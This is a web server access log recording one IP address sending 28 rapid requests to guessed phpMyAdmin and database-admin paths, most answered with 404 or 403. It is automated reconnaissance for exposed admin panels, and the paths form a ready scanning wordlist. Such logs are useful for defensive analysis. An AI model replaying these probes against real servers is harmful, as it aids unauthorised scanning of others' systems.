109.149.247.162 - - [19/Dec/2021:04:26:52 -0500] "GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:52 -0500] "GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:53 -0500] "GET /pma2011/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:53 -0500] "GET /phpmyadmin2014/index.php?lang=en HTTP/1.1" 403 1165
109.149.247.162 - - [19/Dec/2021:04:26:53 -0500] "GET /PMA2017/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:54 -0500] "GET /phpMyAdmin5/index.php?lang=en HTTP/1.1" 403 1165
109.149.247.162 - - [19/Dec/2021:04:26:54 -0500] "GET /phpmyadmin1/index.php?lang=en HTTP/1.1" 403 1165
109.149.247.162 - - [19/Dec/2021:04:26:54 -0500] "GET /myadmin/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:55 -0500] "GET /mysql/dbadmin/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:55 -0500] "GET /phpMyAdmin3/index.php?lang=en HTTP/1.1" 403 1165
109.149.247.162 - - [19/Dec/2021:04:26:55 -0500] "GET /sql/sqlweb/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:56 -0500] "GET /sql/phpmyadmin5/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:56 -0500] "GET /MyAdmin/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:56 -0500] "GET /db/myadmin/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:57 -0500] "GET /2phpmyadmin/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:57 -0500] "GET /phpMyAdmin2/index.php?lang=en HTTP/1.1" 403 1165
109.149.247.162 - - [19/Dec/2021:04:26:57 -0500] "GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:58 -0500] "GET /sql/phpmyadmin4/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:58 -0500] "GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:58 -0500] "GET /pma2011/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:59 -0500] "GET /PMA2011/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:59 -0500] "GET /phpmyadmin2012/index.php?lang=en HTTP/1.1" 403 1165
109.149.247.162 - - [19/Dec/2021:04:26:59 -0500] "GET /PMA2012/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:27:00 -0500] "GET /phpMyadmin/index.php?lang=en HTTP/1.1" 403 1165
109.149.247.162 - - [19/Dec/2021:04:27:00 -0500] "GET /sql/sql/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:27:00 -0500] "GET /PMA2017/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:27:01 -0500] "GET /phpmyadmin/index.php?lang=en HTTP/1.1" 403 1165
109.149.247.162 - - [19/Dec/2021:04:27:01 -0500] "GET /administrator/web/index.php?lang=en HTTP/1.1" 404 1018
